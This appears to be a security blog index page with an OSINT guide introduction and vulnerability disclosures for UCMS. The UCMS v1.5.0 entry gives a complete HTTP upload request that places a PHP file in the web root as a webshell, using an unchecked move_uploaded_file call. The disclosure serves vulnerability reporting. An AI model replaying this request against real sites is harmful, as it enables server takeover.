0%

OSINT 指南

一、前言

开源情报收集(OSINT)指的是通过从媒体、网络、官方渠道等平台,查询、整合一些公开的数据资料,形成系统性情报信息的过程。OSINT信息的获取有主动和被动两种采集方式。被动采集的信息往往来源于第三方威胁情报平台,如shodan、censys等,优点在于查询成本低、行为比较隐蔽。主动采集由于需要与目标进行直接的交互,存在一定风险,但能够获取到更新、更多样化的数据。根据当前已掌握信息的不同,如已知一个域名、一个企业名称或是某个管理员的网络昵称等,有不同的视角可以进行OSINT信息的收集。

阅读全文 »

UCMS v1.5.0 Arbitrary file upload vulnerability

Vulnerability Type :

File upload

Vulnerability Version :

1.5.0

Recurring environment:

  • Windows 10
  • PHP 5.4.5
  • Apache 2.4.23

Vulnerability Description AND recurrence:

The upload bug is very simple

The vulnerability is in the \UCMS_1.5.0\UCMS\sadmin\file.php file, where there is no suffix to verify the uploaded file. Direct move_uploaded_file function has been uploaded.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
POST /ucms/index.php?do=sadmin_file&dir=/ HTTP/1.1
Host: www.ucm1.5.0.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://www.ucm1.5.0.com/ucms/index.php?do=sadmin_file
Content-Type: multipart/form-data; boundary=---------------------------117674106655
Content-Length: 333
Connection: close
Cookie: admin_a83bb0=admin; psw_a83bb0=6609024d5fb57f730314b384acb138e4; token_a83bb0=a81beeab
Upgrade-Insecure-Requests: 1


=-----------------------------117674106655
Content-Disposition: form-data; name="uuu_token"


a81beeab
=-----------------------------117674106655
Content-Disposition: form-data; name="uploadfile"; filename="upload_CNVD.php"
Content-Type: application/octet-stream


<?php phpinfo()?>
=-----------------------------117674106655--

You can access our Webshell in the root directory

UCMS v1.4.0-7 Information leakage

A problem was found in UCMS v1.4.0-7 In line 2 of ucms/chk.php

Vulnerability Type :

Information leakage

Vulnerability Version :

1.4.0-7

阅读全文 »